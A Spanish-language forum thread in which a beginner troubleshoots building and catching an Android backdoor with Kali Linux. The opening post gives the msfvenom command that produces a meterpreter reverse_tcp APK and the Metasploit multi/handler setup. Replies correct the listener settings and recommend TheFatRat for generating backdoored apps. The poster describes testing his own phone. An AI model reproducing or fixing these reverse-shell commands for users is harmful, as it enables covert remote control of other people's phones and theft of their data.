Título: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: Szpilman en 8 Noviembre 2017, 10:56 am Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes root@kali:~# msfconsole [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432? # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.16.13-dev ] + -- --=[ 1697 exploits - 969 auxiliary - 299 post ] + -- --=[ 500 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.xxx.xx.xxx LHOST => 192.xxx.x.xxx msf exploit(handler) > set LPORT 5432 LPORT => 5432 msf exploit(handler) > exploit
Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.
Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal. Tambien he probado utilizando otra ip : msf exploit(handler) > set LHOST 127.0.0.1 LHHOST => 127.0.0.1 msf exploit(handler) > set LPORT 5432 LPORT => 5432 Pero el resultado es este: [-] Exploit failed: The following options failed to validate: LHOST.
Espero que alguien pueda ayudarme. Gracias Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: Avispon99 en 8 Noviembre 2017, 22:54 pm Dices que estas probando con otras ip ??
Osea que te cambias de pc?.. por que te esta pidiendo la local host... Lo estas haciendo desde una maquina virtual? La host local que estas probando hace ping con la maquina victima?.. especifica mas datos de como estas haciendo el pentesting... Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: Szpilman en 9 Noviembre 2017, 00:11 am Perdona estoy empezando en esto y quiero aprender, cuando hablo de dos ip me refiero a la ip local , que empieza por 192. etc. , el objetivo es mi movil, esta conectado a la misma wifi y otras lo tengo solo conectado a la red. Lo estoy haciendo desde virtual box. Que mas datos de puedo dar?
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 08:00:27:f1:fc:39 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 158 bytes 27732 (27.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 404 bytes 31828 (31.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 404 bytes 31828 (31.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.0.203 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 fe80::80f4:c290:e05c:d1a prefixlen 64 scopeid 0x20<link> ether 94:10:3e:ac:df:29 txqueuelen 1000 (Ethernet) RX packets 17289 bytes 13937479 (13.2 MiB) RX errors 0 dropped 5072 overruns 0 frame 0 TX packets 15172 bytes 2466021 (2.3 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: skorux en 14 Noviembre 2017, 22:50 pm ¿Has revisado el peso que tiene la aplicacion?
Hay ocasiones en las que el archivo de salida pesa 0 bytes, supongo que esto es un error durante la generacion del backdoor. Te recomiendo que utilices esta herramienta para crear la aplicacion. https://github.com/Screetsec/TheFatRat Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: Szpilman en 15 Noviembre 2017, 00:51 am Gracias lo haré.
Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: Rubeno953 en 25 Noviembre 2017, 12:50 pm Quería saber si habías solucionado el problema ya que me pasa exactamente lo mismo.
Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit Publicado por: yum-kax en 21 Diciembre 2017, 16:47 pm Creo que no tenes mucha idea de lo que estas haciendo.
1ero el puerto 5432 aparentemente lo usa el msf para conectarse a una db interna.. con lo cual te recomendaria que uses otro si vas a usar una direccion de localhost.. hay 65534 puertos mas para utilizar. 2do ahora que recuerdo metasploit NO permite utilizar la ip 127.0.0.1.. podes usar la 127.0.0.2 ,3 ,4 ,5 etc.. aun asi, en el campo LHOST no va la ip 127.0.0.1 sino la 192.168.0.203. Espero que se les solucione. PD: Intenten interpretar lo que hace el metasploit, no solo copy paste de los tutoriales, sino la curva de aprendizaje deja de ser curva y solo terminamos(me incluyo en algunso casos :silbar: ) repitiendo lo q hay en la red en vez de razonar. Saludos.- |